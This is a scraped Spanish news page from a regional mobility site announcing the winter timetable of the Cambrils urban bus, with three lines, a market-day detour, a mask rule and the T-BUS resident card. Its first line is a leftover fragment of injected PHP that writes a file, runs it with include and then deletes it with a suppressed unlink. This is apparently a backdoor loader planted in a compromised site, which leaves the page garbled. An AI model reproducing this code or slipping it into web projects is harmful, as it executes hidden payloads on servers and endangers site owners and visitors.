");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> El autobús urbano de Cambrils inicia el servicio de la temporada de invierno
Iconos cabecera

Destacamos

  • SEM 2021SEM 2021
    Semana Europea de la Movilida 2021

El autobús urbano de Cambrils inicia el servicio de la temporada de invierno (13/09/2021)

El bus urbano de Cambrils ha iniciado los horarios de la temporada de invierno. El servicio cuenta con tres líneas que posibilitan el enlace desde los barrios a los puntos más generadores de movilidad: L1 (la zona Levante), L2 (la zona Poniente) y L3 (la zona centro).

El horario de lunes a viernes será el prácticamente el mismo que la temporada pasada exceptuando ajustes de tiempo puntuales. El servicio de los sábados será exactamente igual que el invierno pasado. Como siempre, los miércoles por la mañana, con motivo del mercadillo ambulante, el bus no pasará por las paradas Milenario y Paseo Albert.

Todos los horarios y recorridos se pueden descargar desde la web: www.aparcam.cat. También se podrán pedir los horarios en los puntos habituales: Ayuntamiento y equipamientos municipales, el Patronato de Turismo, a paradas urbanas y los mismos autobuses. Además los usuarios residentes que disponen de la tarjeta T-BUS se les facilitará la información por correo electrónico.

Obligatoriedad del uso de la mascarilla

Para preservar la seguridad, se establece la obligatoriedad de la mascarilla para poder hacer uso del transporte urbano de Cambrils.

Tarjeta T-BUS para los residentes

La tarjeta de Cambrils T-BUS para residentes permite hacer tantos viajes como se quiera con los autobuses urbanos hasta finales de año. Se puede obtener en la Oficina de Atención a la Ciudadanía del Ayuntamiento y tiene un coste de 10 euros anuales.

Fuente: Ayuntamiento de Cambrils

El autobús urbano de Cambrils inicia el servicio de la temporada de invierno

[Volver a Noticias]

 
Calle de Anselm Clavé, 1 43004 - Tarragona